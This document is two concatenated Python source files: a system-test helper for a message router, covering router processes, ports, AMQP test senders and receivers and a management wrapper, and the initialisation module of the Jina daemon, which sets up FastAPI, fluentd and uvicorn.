# v = string | scalar | dict
return "".join(["%s%s: %s\n" % (tabs(level),
k,
value(v, level + 1))
for k, v in e.items()])
self.defaults()
# top level list of tuples ('section-name', dict)
return "".join(["%s {\n%s}\n" % (n, attributes(p, 1)) for n, p in self])
def __init__(self, name=None, config=Config(), pyinclude=None, wait=True,
perform_teardown=True, cl_args=None, expect=Process.RUNNING):
"""
@param name: name used for for output files, default to id from config.
@param config: router configuration
@keyword wait: wait for router to be ready (call self.wait_ready())
"""
cl_args = cl_args or []
self.config = copy(config)
self.perform_teardown = perform_teardown
if not name:
name = self.config.router_id
assert name
# setup log and debug dump files
self.dumpfile = os.path.abspath('%s-qddebug.txt' % name)
self.config.sections('router')[0]['debugDumpFile'] = self.dumpfile
default_log = [l for l in config if (l[0] == 'log' and l[1]['module'] == 'DEFAULT')]
if not default_log:
self.logfile = "%s.log" % name
config.append(
('log', {'module': 'DEFAULT', 'enable': 'trace+',
'includeSource': 'true', 'outputFile': self.logfile}))
else:
self.logfile = default_log[0][1].get('outputFile')
args = ['skrouterd', '-c', config.write(name)] + cl_args
env_home = os.environ.get('QPID_DISPATCH_HOME')
if pyinclude:
args += ['-I', pyinclude]
elif env_home:
args += ['-I', os.path.join(env_home, 'python')]
args = os.environ.get('QPID_DISPATCH_RUNNER', '').split() + args
super(Qdrouterd, self).__init__(args, name=name, expect=expect)
self._management = None
self._wait_ready = False
if wait:
self.wait_ready()
@property
def management(self):
"""Return a management agent proxy for this router"""
if not self._management:
self._management = Node.connect(self.addresses[0], timeout=TIMEOUT)
return self._management
def teardown(self):
if self._management:
try:
self._management.close()
except:
pass
self._management = None
if not self.perform_teardown:
return
teardown_exc = None
try:
super(Qdrouterd, self).teardown()
except Exception as exc:
# re-raise _after_ dumping all the state we can
teardown_exc = exc
def check_output_file(filename, description):
"""check router's debug dump file for anything interesting (should be
empty) and dump it to stderr for perusal by organic lifeforms"""
try:
if os.stat(filename).st_size > 0:
with open(filename) as f:
sys.stderr.write("\nRouter %s %s:\n>>>>\n" %
(self.config.router_id, description))
sys.stderr.write(f.read())
sys.stderr.write("\n<<<<\n")
sys.stderr.flush()
except OSError:
# failed to open file. This can happen when an individual test
# spawns a temporary router (i.e. not created as part of the
# TestCase setUpClass method) that gets cleaned up by the test.
pass
check_output_file(filename=self.outfile + '.out', description="output file")
check_output_file(filename=self.dumpfile, description="debug dump file")
if teardown_exc:
# teardown failed - possible router crash?
# dump extra stuff (command line, output, log)
def tail_file(fname, line_count=50):
"""Tail a file to a list"""
out = []
with open(fname) as f:
line = f.readline()
while line:
out.append(line)
if len(out) > line_count:
out.pop(0)
line = f.readline()
return out
try:
for fname in [("output", self.outfile + '.out'),
("command", self.outfile + '.cmd')]:
with open(fname[1]) as f:
sys.stderr.write("\nRouter %s %s file:\n>>>>\n" %
(self.config.router_id, fname[0]))
sys.stderr.write(f.read())
sys.stderr.write("\n<<<<\n")
if self.logfile:
sys.stderr.write("\nRouter %s log file tail:\n>>>>\n" %
self.config.router_id)
tail = tail_file(os.path.join(self.outdir, self.logfile))
for ln in tail:
sys.stderr.write("%s" % ln)
sys.stderr.write("\n<<<<\n")
sys.stderr.flush()
except OSError:
# ignore file not found in case test never opens these
pass
raise teardown_exc
@property
def ports_family(self):
"""
Return a dict of listener ports and the respective port family
Example -
{ 23456: 'IPv4', 243455: 'IPv6' }
"""
ports_fam = {}
for l in self.config.sections('listener'):
if l.get('socketAddressFamily'):
ports_fam[l['port']] = l['socketAddressFamily']
else:
ports_fam[l['port']] = 'IPv4'
return ports_fam
@property
def ports(self):
"""Return list of configured ports for all listeners"""
return [l['port'] for l in self.config.sections('listener')]
def _cfg_2_host_port(self, c):
host = c['host']
port = c['port']
socket_address_family = c.get('socketAddressFamily', 'IPv4')
if socket_address_family == 'IPv6':
return "[%s]:%s" % (host, port)
elif socket_address_family == 'IPv4':
return "%s:%s" % (host, port)
raise Exception("Unknown socket address family: %s" % socket_address_family)
@property
def http_addresses(self):
"""Return http://host:port addresses for all http listeners"""
cfg = self.config.sections('httpListener')
return ["http://%s" % self._cfg_2_host_port(l) for l in cfg]
@property
def addresses(self):
"""Return amqp://host:port addresses for all listeners"""
cfg = self.config.sections('listener')
return ["amqp://%s" % self._cfg_2_host_port(l) for l in cfg]
@property
def connector_addresses(self):
"""Return list of amqp://host:port for all connectors"""
cfg = self.config.sections('connector')
return ["amqp://%s" % self._cfg_2_host_port(c) for c in cfg]
@property
def hostports(self):
"""Return host:port for all listeners"""
return [self._cfg_2_host_port(l) for l in self.config.sections('listener')]
def is_connected(self, port, host='127.0.0.1'):
"""If router has a connection to host:port:identity return the management info.
Otherwise return None"""
try:
ret_val = False
response = self.management.query(type="io.skupper.router.connection")
index_host = response.attribute_names.index('host')
for result in response.results:
outs = '%s:%s' % (host, port)
if result[index_host] == outs:
ret_val = True
return ret_val
except:
return False
def wait_address(self, address, subscribers=0, remotes=0, count=1, **retry_kwargs):
"""
Wait for an address to be visible on the router.
@keyword subscribers: Wait till subscriberCount >= subscribers
@keyword remotes: Wait till remoteCount >= remotes
@keyword count: Wait until >= count matching addresses are found
@param retry_kwargs: keyword args for L{retry}
"""
def check():
# TODO aconway 2014-06-12: this should be a request by name, not a query.
# Need to rationalize addresses in management attributes.
# endswith check is because of M/L/R prefixes
addrs = self.management.query(
type='io.skupper.router.router.address',
attribute_names=['name', 'subscriberCount', 'remoteCount']).get_entities()
addrs = [a for a in addrs if a['name'].endswith(address)]
return (len(addrs) >= count
and addrs[0]['subscriberCount'] >= subscribers
and addrs[0]['remoteCount'] >= remotes)
assert retry(check, **retry_kwargs)
def wait_address_unsubscribed(self, address, **retry_kwargs):
"""
Block until address has no subscribers
"""
a_type = 'io.skupper.router.router.address'
def check():
addrs = self.management.query(a_type).get_dicts()
rc = [a for a in addrs if a['name'].endswith(address)]
count = 0
for a in rc:
count += a['subscriberCount']
count += a['remoteCount']
return count == 0
assert retry(check, **retry_kwargs)
def get_host(self, socket_address_family):
if socket_address_family == 'IPv4':
return '127.0.0.1'
elif socket_address_family == 'IPv6':
return '::1'
else:
return '127.0.0.1'
def wait_ports(self, **retry_kwargs):
wait_ports(self.ports_family, **retry_kwargs)
def wait_connectors(self, **retry_kwargs):
"""
Wait for all connectors to be connected
@param retry_kwargs: keyword args for L{retry}
"""
for c in self.config.sections('connector'):
assert retry(lambda: self.is_connected(port=c['port'], host=self.get_host(c.get('socketAddressFamily'))),
**retry_kwargs), "Port not connected %s" % c['port']
def wait_startup_message(self, **retry_kwargs):
"""Wait for router startup message to be printed into logfile
This ensures that the router installs its signal handlers, avoiding
a router failure with return code -15 upon premature SIGTERM (DISPATCH-1689)
e.g. 2022-03-03 19:08:13.608655 +0100 SERVER (notice) Operational, 4 Threads Running (process ID 2190110)
"""
def _is_startup_line_present(f: TextIO) -> bool:
for line in f:
m = re.search(r'SERVER \(notice\) Operational, (\d+) Threads Running \(process ID (\d+)\)', line)
if m:
return True
return False
logfile_path = self.logfile_path
# system_tests_log_level_update filters SERVER module logs to a separate file
server_log = [l for l in self.config if (l[0] == 'log' and l[1]['module'] == 'SERVER')]
if server_log:
logfile_path = os.path.join(self.outdir, server_log[0][1].get('outputFile'))
assert retry(lambda: pathlib.Path(logfile_path).is_file(), **retry_kwargs), \
f"Router logfile {logfile_path} does not exist or is not a file"
with open(logfile_path, 'rt') as router_log:
assert retry(lambda: _is_startup_line_present(router_log), **retry_kwargs),\
"Router startup line not present in router log"
def wait_ready(self, **retry_kwargs):
"""Wait for ports and connectors to be ready"""
if not self._wait_ready:
self._wait_ready = True
self.wait_ports(**retry_kwargs)
self.wait_connectors(**retry_kwargs)
self.wait_startup_message(**retry_kwargs)
return self
def is_router_connected(self, router_id, **retry_kwargs):
node = None
try:
self.management.read(identity="router.node/%s" % router_id)
# TODO aconway 2015-01-29: The above check should be enough, we
# should not advertise a remote router in management till it is fully
# connected. However we still get a race where the router is not
# actually ready for traffic. Investigate.
# Meantime the following actually tests send-thru to the router.
node = Node.connect(self.addresses[0], router_id, timeout=1)
return retry_exception(lambda: node.query('io.skupper.router.router'))
except (proton.ConnectionException, NotFoundStatus, proton.utils.LinkDetached):
# proton.ConnectionException: the router is not yet accepting connections
# NotFoundStatus: the queried router is not yet connected
# TODO(DISPATCH-2119) proton.utils.LinkDetached: should be removed, currently needed for DISPATCH-2033
return False
finally:
if node:
node.close()
def wait_router_connected(self, router_id, **retry_kwargs):
retry(lambda: self.is_router_connected(router_id), **retry_kwargs)
@property
def logfile_path(self):
"""Path to a DEFAULT logfile"""
return os.path.join(self.outdir, self.logfile)
class Tester:
"""Tools for use by TestCase
- Create a directory for the test.
- Utilities to create processes and servers, manage ports etc.
- Clean up processes on teardown"""
# Top level directory above any Tester directories.
# CMake-generated configuration may be found here.
top_dir = os.getcwd()
# The root directory for Tester directories, under top_dir
root_dir = os.path.abspath(__name__ + '.dir')
# Minimum and maximum port number for free port searches
port_range = (20000, 30000)
def __init__(self, id):
"""
@param id: module.class.method or False if no directory should be created
"""
self.directory = os.path.join(self.root_dir, *id.split('.')) if id else None
self.cleanup_list = []
self.port_file = pathlib.Path(self.top_dir, "next_port.lock").open("a+t")
self.cleanup(self.port_file)
def rmtree(self):
"""Remove old test class results directory"""
if self.directory:
shutil.rmtree(os.path.dirname(self.directory), ignore_errors=True)
def setup(self):
"""Called from test setup and class setup."""
if self.directory:
os.makedirs(self.directory)
os.chdir(self.directory)
def _next_port(self) -> int:
"""Reads and increments value stored in self.port_file, under an exclusive file lock.
When a lock cannot be acquired immediately, fcntl.lockf blocks.
Failure possibilities:
File locks may not work correctly on network filesystems. We still should be no worse off than we were.
This method always unlocks the lock file, so it should not ever deadlock other tests running in parallel.
Even if that happened, the lock is unlocked by the OS when the file is closed, which happens automatically
when the process that opened and locked it ends.
Invalid content in the self.port_file will break this method. Manual intervention is then required.
"""
try:
fcntl.flock(self.port_file, fcntl.LOCK_EX)
# read old value
self.port_file.seek(0, os.SEEK_END)
if self.port_file.tell() != 0:
self.port_file.seek(0)
port = int(self.port_file.read())
else:
# file is empty
port = random.randint(self.port_range[0], self.port_range[1])
next_port = port + 1
if next_port >= self.port_range[1]:
next_port = self.port_range[0]
# write new value
self.port_file.seek(0)
self.port_file.truncate(0)
self.port_file.write(str(next_port))
self.port_file.flush()
return port
finally:
fcntl.flock(self.port_file, fcntl.LOCK_UN)
def teardown(self):
"""Clean up (tear-down, stop or close) objects recorded via cleanup()"""
self.cleanup_list.reverse()
errors = []
for obj in self.cleanup_list:
try:
for method in ["teardown", "tearDown", "stop", "close"]:
cleanup = getattr(obj, method, None)
if cleanup:
cleanup()
break
except Exception as exc:
errors.append(exc)
if errors:
raise RuntimeError("Errors during teardown: \n\n%s" % "\n\n".join([str(e) for e in errors]))
def cleanup(self, x):
"""Record object x for clean-up during tear-down.
x should have on of the methods teardown, tearDown, stop or close"""
self.cleanup_list.append(x)
return x
def popen(self, *args, **kwargs):
"""Start a Process that will be cleaned up on teardown"""
return self.cleanup(Process(*args, **kwargs))
def qdrouterd(self, *args, **kwargs):
"""Return a Qdrouterd that will be cleaned up on teardown"""
return self.cleanup(Qdrouterd(*args, **kwargs))
def http2server(self, *args, **kwargs):
return self.cleanup(Http2Server(*args, **kwargs))
def get_port(self, socket_address_family: str = 'IPv4') -> int:
"""Get an unused port"""
p = self._next_port()
start = p
while not is_port_available(p, socket_address_family):
p = self._next_port()
if p == start:
raise Exception("No available ports in range %s", self.port_range)
return p
class TestCase(unittest.TestCase, Tester): # pylint: disable=too-many-public-methods
"""A TestCase that sets up its own working directory and is also a Tester."""
tester: Tester
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName)
Tester.__init__(self, self.id())
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.maxDiff = None
cls.tester = Tester('.'.join([cls.__module__, cls.__name__, 'setUpClass']))
cls.tester.rmtree()
cls.tester.setup()
@classmethod
def tearDownClass(cls):
if hasattr(cls, 'tester'):
cls.tester.teardown()
del cls.tester
super().tearDownClass()
def setUp(self):
super().setUp()
Tester.setup(self)
def tearDown(self):
Tester.teardown(self)
super().tearDown()
def assert_fair(self, seq):
avg = sum(seq) / len(seq)
for i in seq:
assert i > avg / 2, "Work not fairly distributed: %s" % seq
if not hasattr(unittest.TestCase, 'assertRegex'):
def assertRegex(self, text, regexp, msg=None):
assert re.search(regexp, text), msg or "Can't find %r in '%s'" % (regexp, text)
if not hasattr(unittest.TestCase, 'assertNotRegex'):
def assertNotRegex(self, text, regexp, msg=None):
assert not re.search(regexp, text), msg or "Found %r in '%s'" % (regexp, text)
def main_module():
"""
Return the module name of the __main__ module - i.e. the filename with the
path and .py extension stripped. Useful to run the tests in the current file but
using the proper module prefix instead of '__main__', as follows:
if __name__ == '__main__':
unittest.main(module=main_module())
"""
return os.path.splitext(os.path.basename(__main__.__file__))[0]
class AsyncTestReceiver(MessagingHandler):
"""
A simple receiver that runs in the background and queues any received
messages. Messages can be retrieved from this thread via the queue member.
:param wait: block the constructor until the link has been fully
established.
:param recover_link: restart on remote link detach
"""
Empty = Queue.Empty
class MyQueue(Queue.Queue):
def __init__(self, receiver):
self._async_receiver = receiver
super(AsyncTestReceiver.MyQueue, self).__init__()
def get(self, timeout=TIMEOUT):
self._async_receiver.num_queue_gets += 1
msg = super(AsyncTestReceiver.MyQueue, self).get(timeout=timeout)
self._async_receiver._logger.log("message %d get"
% self._async_receiver.num_queue_gets)
return msg
def put(self, msg):
self._async_receiver.num_queue_puts += 1
super(AsyncTestReceiver.MyQueue, self).put(msg)
self._async_receiver._logger.log("message %d put"
% self._async_receiver.num_queue_puts)
def __init__(self, address, source, conn_args=None, container_id=None,
wait=True, recover_link=False, msg_args=None, print_to_console=False):
if msg_args is None:
msg_args = {}
super(AsyncTestReceiver, self).__init__(**msg_args)
self.address = address
self.source = source
self.conn_args = conn_args
self.queue = AsyncTestReceiver.MyQueue(self)
self._conn = None
self._container = Container(self)
cid = container_id or "ATR-%s:%s" % (source, uuid.uuid4())
self._container.container_id = cid
self._ready = Event()
self._recover_link = recover_link
self._recover_count = 0
self._stop_thread = False
self._thread = Thread(target=self._main)
self._logger = Logger(title="AsyncTestReceiver %s" % cid, print_to_console=print_to_console)
self._thread.daemon = True
self._thread.start()
self.num_queue_puts = 0
self.num_queue_gets = 0
if wait and self._ready.wait(timeout=TIMEOUT) is False:
raise Exception("Timed out waiting for receiver start")
self.queue_stats = "self.num_queue_puts=%d, self.num_queue_gets=%d"
def get_queue_stats(self):
return self.queue_stats % (self.num_queue_puts, self.num_queue_gets)
def _main(self):
self._container.timeout = 0.5
self._container.start()
self._logger.log("AsyncTestReceiver Starting reactor")
while self._container.process():
if self._stop_thread:
if self._conn:
self._conn.close()
self._conn = None
self._logger.log("AsyncTestReceiver reactor thread done")
def on_connection_error(self, event):
self._logger.log("AsyncTestReceiver on_connection_error=%s" % event.connection.remote_condition.description)
def on_link_error(self, event):
self._logger.log("AsyncTestReceiver on_link_error=%s" % event.link.remote_condition.description)
def stop(self, timeout=TIMEOUT):
self._stop_thread = True
self._container.wakeup()
self._thread.join(timeout=TIMEOUT)
self._logger.log("thread done")
if self._thread.is_alive():
raise Exception("AsyncTestReceiver did not exit")
del self._conn
del self._container
def on_start(self, event):
kwargs = {'url': self.address}
if self.conn_args:
kwargs.update(self.conn_args)
self._conn = event.container.connect(**kwargs)
def on_connection_opened(self, event):
self._logger.log("Connection opened")
kwargs = {'source': self.source}
event.container.create_receiver(event.connection, **kwargs)
def on_link_opened(self, event):
self._logger.log("link opened")
self._ready.set()
def on_link_closing(self, event):
self._logger.log("link closing")
event.link.close()
if self._recover_link and not self._stop_thread:
# lesson learned: the generated link name will be the same as the
# old link (which is bad) so we specify a new one
self._recover_count += 1
kwargs = {'source': self.source,
'name': "%s:%s" % (event.link.name, self._recover_count)}
rcv = event.container.create_receiver(event.connection,
**kwargs)
def on_message(self, event):
self.queue.put(event.message)
def on_disconnected(self, event):
# if remote terminates the connection kill the thread else it will spin
# on the cpu
self._logger.log("Disconnected")
if self._conn:
self._conn.close()
self._conn = None
def dump_log(self):
self._logger.dump()
class AsyncTestSender(MessagingHandler):
"""
A simple sender that runs in the background and sends 'count' messages to a
given target.
"""
class TestSenderException(Exception):
def __init__(self, error=None):
super(AsyncTestSender.TestSenderException, self).__init__(error)
def __init__(self, address, target, count=1, message=None,
container_id=None, presettle=False, print_to_console=False):
super(AsyncTestSender, self).__init__(auto_accept=False,
auto_settle=False)
self.address = address
self.target = target
self.total = count
self.presettle = presettle
self.accepted = 0
self.released = 0
self.modified = 0
self.rejected = 0
self.sent = 0
self.error = None
self.link_stats = None
self._conn = None
self._sender = None
self._message = message or Message(body="test")
self._container = Container(self)
cid = container_id or "ATS-%s:%s" % (target, uuid.uuid4())
self._container.container_id = cid
self._link_name = "%s-%s" % (cid, "tx")
self._thread = Thread(target=self._main)
self._thread.daemon = True
self._logger = Logger(title="AsyncTestSender %s" % cid, print_to_console=print_to_console)
self._thread.start()
self.msg_stats = "self.sent=%d, self.accepted=%d, self.released=%d, self.modified=%d, self.rejected=%d"
def _main(self):
self._container.timeout = 0.5
self._container.start()
self._logger.log("AsyncTestSender Starting reactor")
while self._container.process():
self._check_if_done()
self._logger.log("AsyncTestSender reactor thread done")
def get_msg_stats(self):
return self.msg_stats % (self.sent, self.accepted, self.released, self.modified, self.rejected)
def wait(self):
# don't stop it - wait until everything is sent
self._logger.log("AsyncTestSender wait: about to join thread")
self._thread.join(timeout=TIMEOUT)
self._logger.log("AsyncTestSender wait: thread done")
assert not self._thread.is_alive(), "sender did not complete"
if self.error:
raise AsyncTestSender.TestSenderException(self.error)
del self._sender
del self._conn
del self._container
self._logger.log("AsyncTestSender wait: no errors in wait")
def on_start(self, event):
self._conn = self._container.connect(self.address)
def on_connection_opened(self, event):
self._logger.log("Connection opened")
option = AtMostOnce if self.presettle else AtLeastOnce
self._sender = self._container.create_sender(self._conn,
target=self.target,
options=option(),
name=self._link_name)
def on_sendable(self, event):
if self.sent < self.total:
self._sender.send(self._message)
self.sent += 1
self._logger.log("message %d sent" % self.sent)
def _check_if_done(self):
done = (self.sent == self.total
and (self.presettle
or (self.accepted + self.released + self.modified
+ self.rejected == self.sent)))
if done and self._conn:
self.link_stats = get_link_info(self._link_name,
self.address)
self._conn.close()
self._conn = None
self._logger.log("Connection closed")
def on_accepted(self, event):
self.accepted += 1
event.delivery.settle()
self._logger.log("message %d accepted" % self.accepted)
def on_released(self, event):
# for some reason Proton 'helpfully' calls on_released even though the
# delivery state is actually MODIFIED
if event.delivery.remote_state == Delivery.MODIFIED:
return self.on_modified(event)
self.released += 1
event.delivery.settle()
self._logger.log("message %d released" % self.released)
def on_modified(self, event):
self.modified += 1
event.delivery.settle()
self._logger.log("message %d modified" % self.modified)
def on_rejected(self, event):
self.rejected += 1
event.delivery.settle()
self._logger.log("message %d rejected" % self.rejected)
def on_link_error(self, event):
self.error = "link error:%s" % str(event.link.remote_condition)
self._logger.log(self.error)
if self._conn:
self._conn.close()
self._conn = None
def on_disconnected(self, event):
# if remote terminates the connection kill the thread else it will spin
# on the cpu
self.error = "connection to remote dropped"
self._logger.log(self.error)
if self._conn:
self._conn.close()
self._conn = None
def dump_log(self):
self._logger.dump()
class QdManager:
"""
A means to invoke skmanage during a testcase
"""
def __init__(self, address: Optional[str] = None,
timeout: Optional[float] = TIMEOUT,
router_id: Optional[str] = None,
edge_router_id: Optional[str] = None) -> None:
# 'tester' - can be 'self' when called in a test,
# or an instance any class derived from Process (like Qdrouterd)
self._timeout = timeout
self._address = address
self.router_id = router_id
self.edge_router_id = edge_router_id
self.router: List[str] = []
if self.router_id:
self.router = self.router + ['--router', self.router_id]
elif self.edge_router_id:
self.router = self.router + ['--edge-router', self.edge_router_id]
def __call__(self, cmd: str,
address: Optional[str] = None,
input: Optional[str] = None,
timeout: Optional[float] = None) -> str:
addr = address or self._address
assert addr, "address missing"
with subprocess.Popen(['skmanage'] + cmd.split(' ') + self.router
+ ['--bus', addr, '--indent=-1', '--timeout',
str(timeout or self._timeout)], stdin=PIPE,
stdout=PIPE, stderr=STDOUT,
universal_newlines=True) as p:
rc = p.communicate(input)
if p.returncode != 0:
raise Exception("%s %s" % rc)
return rc[0]
def create(self, long_type, kwargs):
cmd = "CREATE --type=%s" % long_type
for k, v in kwargs.items():
cmd += " %s=%s" % (k, v)
return json.loads(self(cmd))
def update(self, long_type, kwargs, name=None, identity=None):
cmd = 'UPDATE --type=%s' % long_type
if identity is not None:
cmd += " --identity=%s" % identity
elif name is not None:
cmd += " --name=%s" % name
for k, v in kwargs.items():
cmd += " %s=%s" % (k, v)
return json.loads(self(cmd))
def delete(self, long_type, name=None, identity=None):
cmd = 'DELETE --type=%s' % long_type
if identity is not None:
cmd += " --identity=%s" % identity
elif name is not None:
cmd += " --name=%s" % name
else:
assert False, "name or identity not supplied!"
self(cmd)
def query(self, long_type):
return json.loads(self('QUERY --type=%s' % long_type))
def get_log(self, limit=None):
cmd = 'GET-LOG'
if (limit):
cmd += " limit=%s" % limit
return json.loads(self(cmd))
class MgmtMsgProxy:
"""
Utility for creating and inspecting management messages
"""
class _Response:
def __init__(self, status_code, status_description, body):
self.status_code = status_code
self.status_description = status_description
if body.__class__ == dict and len(body.keys()) == 2 and 'attributeNames' in body.keys() and 'results' in body.keys():
results = []
names = body['attributeNames']
for result in body['results']:
result_map = {}
for i in range(len(names)):
result_map[names[i]] = result[i]
results.append(MgmtMsgProxy._Response(status_code, status_description, result_map))
self.attrs = {'results': results}
else:
self.attrs = body
def __getattr__(self, key):
return self.attrs[key]
def __init__(self, reply_addr):
self.reply_addr = reply_addr
def response(self, msg):
ap = msg.properties
return self._Response(ap['statusCode'], ap['statusDescription'], msg.body)
def query_router(self):
ap = {'operation': 'QUERY', 'type': 'io.skupper.router.router'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_connections(self):
ap = {'operation': 'QUERY', 'type': 'io.skupper.router.connection'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_links(self):
ap = {'operation': 'QUERY', 'type': 'io.skupper.router.router.link'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_addresses(self):
ap = {'operation': 'QUERY',
'type': 'io.skupper.router.router.address'}
return Message(properties=ap, reply_to=self.reply_addr)
def create_connector(self, name, **kwargs):
ap = {'operation': 'CREATE',
'type': 'io.skupper.router.connector',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr,
body=kwargs)
def delete_connector(self, name):
ap = {'operation': 'DELETE',
'type': 'io.skupper.router.connector',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr)
class TestTimeout:
"""
A callback object for MessagingHandler class
parent: A MessagingHandler with a timeout() method
"""
__test__ = False
def __init__(self, parent):
self.parent = parent
def on_timer_task(self, event):
self.parent.timeout()
class PollTimeout:
"""
A callback object for MessagingHandler scheduled timers
parent: A MessagingHandler with a poll_timeout() method
"""
def __init__(self, parent):
self.parent = parent
def on_timer_task(self, event):
self.parent.poll_timeout()
def get_link_info(name, address):
"""
Query the router at address for the status and statistics of the named link
"""
qdm = QdManager(address=address)
rc = qdm.query('io.skupper.router.router.link')
for item in rc:
if item.get('name') == name:
return item
return None
def has_mobile_dest_in_address_table(address, dest):
qdm = QdManager(address=address)
rc = qdm.query('io.skupper.router.router.address')
has_dest = False
for item in rc:
if dest in item.get("name"):
has_dest = True
break
return has_dest
def get_inter_router_links(address):
"""
Return a list of all links with type="inter-router
:param address:
"""
inter_router_links = []
qdm = QdManager(address=address)
rc = qdm.query('io.skupper.router.router.link')
for item in rc:
if item.get("linkType") == "inter-router":
inter_router_links.append(item)
return inter_router_links
class Timestamp:
"""
Time stamps for logging.
"""
def __init__(self):
self.ts = datetime.now()
def __str__(self):
return self.ts.strftime("%Y-%m-%d %H:%M:%S.%f")
class Logger:
"""
Record an event log for a self test.
May print per-event or save events to be printed later.
Pytest will automatically collect the logs and will dump them for a failed test
Optional file opened in 'append' mode to which each log line is written.
"""
def __init__(self,
title: str = "Logger",
print_to_console: bool = False,
save_for_dump: bool = True,
python_log_level: Optional[int] = logging.DEBUG,
ofilename: Optional[str] = None) -> None:
self.title = title
self.print_to_console = print_to_console
self.save_for_dump = save_for_dump
self.python_log_level = python_log_level
self.ofilename = ofilename
self.logs: List[Tuple[Timestamp, str]] = []
def log(self, msg):
ts = Timestamp()
if self.save_for_dump:
self.logs.append((ts, msg))
if self.print_to_console:
print("%s %s" % (ts, msg))
sys.stdout.flush()
if self.python_log_level is not None:
logging.log(self.python_log_level, f"{ts} {self.title}: {msg}")
if self.ofilename is not None:
with open(self.ofilename, 'a') as f_out:
f_out.write("%s %s\n" % (ts, msg))
f_out.flush()
def dump(self):
print(self)
sys.stdout.flush()
def __str__(self):
lines = [self.title]
for ts, msg in self.logs:
lines.append("%s %s" % (ts, msg))
res = str('\n'.join(lines))
return res
def curl_available():
"""
Check if the curl command line tool is present on the system.
Return a tuple containing the version if found, otherwise
return false.
"""
popen_args = ['curl', '--version']
try:
process = Process(popen_args,
name='curl_check',
stdout=PIPE,
expect=None,
universal_newlines=True)
out = process.communicate()[0]
if process.returncode == 0:
# return curl version as a tuple (major, minor[,fix])
# expects --version outputs "curl X.Y.Z ..."
return tuple([int(x) for x in out.split()[1].split('.')])
except:
pass
return False
def run_curl(args, input=None, timeout=TIMEOUT):
"""
Run the curl command with the given argument list.
Pass optional input to curls stdin.
Return tuple of (return code, stdout, stderr)
"""
popen_args = ['curl'] + args
if timeout is not None:
popen_args = popen_args + ["--max-time", str(timeout)]
stdin_value = PIPE if input is not None else None
with subprocess.Popen(popen_args, stdin=stdin_value, stdout=PIPE,
stderr=PIPE, universal_newlines=True) as p:
out = p.communicate(input, timeout)
return p.returncode, out[0], out[1]
|
__init__.py
|
import os
import pathlib
import subprocess
from pathlib import Path
from queue import Queue
from threading import Thread
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from uvicorn import Config, Server
from jina import __version__, __resources_path__
from jina.logging.logger import JinaLogger
from .excepts import (
Runtime400Exception,
RequestValidationError,
PartialDaemon400Exception,
daemon_runtime_exception_handler,
partial_daemon_exception_handler,
validation_exception_handler,
)
from .parser import get_main_parser, _get_run_args
jinad_args = get_main_parser().parse_args([])
daemon_logger = JinaLogger('DAEMON', **vars(jinad_args))
__task_queue__ = Queue()
__root_workspace__ = jinad_args.workspace
__rootdir__ = str(Path(__file__).parent.parent.absolute())
__dockerfiles__ = str(Path(__file__).parent.absolute() / 'Dockerfiles')
def _get_app(mode=None):
from .api.endpoints import router
app = FastAPI(
title='JinaD (Daemon)',
description='REST interface for managing distributed Jina',
version=__version__,
openapi_tags=[
{
'name': 'daemon',
'description': 'API to manage the Daemon',
},
],
)
app.add_middleware(
CORSMiddleware,
allow_origins=['*'],
allow_credentials=True,
allow_methods=['*'],
allow_headers=['*'],
)
app.include_router(router)
app.add_exception_handler(RequestValidationError, validation_exception_handler)
if mode is None:
from .api.endpoints import flows, pods, peas, logs, workspaces
app.include_router(logs.router)
app.include_router(peas.router)
app.include_router(pods.router)
app.include_router(flows.router)
app.include_router(workspaces.router)
app.add_exception_handler(Runtime400Exception, daemon_runtime_exception_handler)
app.openapi_tags.extend(
[
{
'name': 'flows',
'description': 'API to manage Flows',
},
{
'name': 'pods',
'description': 'API to manage Pods',
},
{
'name': 'peas',
'description': 'API to manage Peas',
},
{
'name': 'logs',
'description': 'API to stream Logs',
},
{
'name': 'workspaces',
'description': 'API to manage Workspaces',
},
]
)
elif mode == 'pod':
from .api.endpoints.partial import pod
app.include_router(pod.router)
app.add_exception_handler(
PartialDaemon400Exception, partial_daemon_exception_handler
)
app.openapi_tags.append(
{
'name': 'pod',
'description': 'API to manage a Pod',
}
)
elif mode == 'pea':
from .api.endpoints.partial import pea
app.include_router(pea.router)
app.add_exception_handler(
PartialDaemon400Exception, partial_daemon_exception_handler
)
app.openapi_tags.append(
{
'name': 'pea',
'description': 'API to manage a Pea',
},
)
elif mode == 'flow':
from .api.endpoints.partial import flow
app.include_router(flow.router)
app.add_exception_handler(
PartialDaemon400Exception, partial_daemon_exception_handler
)
app.openapi_tags.append(
{
'name': 'flow',
'description': 'API to manage a Flow',
}
)
return app
def _update_default_args():
global jinad_args, __root_workspace__
jinad_args = _get_run_args()
__root_workspace__ = '/workspace' if jinad_args.mode else jinad_args.workspace
def _start_fluentd():
daemon_logger.info('starting fluentd...')
cfg = os.path.join(__resources_path__, 'fluent.conf')
try:
fluentd_proc = subprocess.Popen(
['fluentd', '-c', cfg],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
bufsize=0,
universal_newlines=True,
)
# avoid printing debug logs for partial daemon (jinad_args is set)
if jinad_args.mode is None:
for line in fluentd_proc.stdout:
daemon_logger.debug(f'fluentd: {line.strip()}')
except FileNotFoundError:
daemon_logger.warning('fluentd not found locally, jinad cannot stream logs!')
jinad_args.no_fluentd = True
def _start_consumer():
from .tasks import ConsumerThread
ConsumerThread().start()
def _start_uvicorn(app: 'FastAPI'):
config = Config(
app=app,
host=jinad_args.host,
port=jinad_args.port_expose,
loop='uvloop',
log_level='error',
)
server = Server(config=config)
server.run()
def setup():
"""Setup steps for JinaD"""
_update_default_args()
pathlib.Path(__root_workspace__).mkdir(parents=True, exist_ok=True)
if not jinad_args.no_fluentd:
Thread(target=_start_fluentd, daemon=True).start()
_start_consumer()
_start_uvicorn(app=_get_app(mode=jinad_args.mode))
def teardown():
"""Cleanup steps for JinaD"""
from jina import __stop_msg__
daemon_logger.success(__stop_msg__)
daemon_logger.close()
def main():
"""Entrypoint for JinaD"""
try:
setup()
except KeyboardInterrupt:
pass
except Exception as e:
daemon_logger.info(f'error while server was running {e!r}')
finally:
teardown()
|
sampler.py
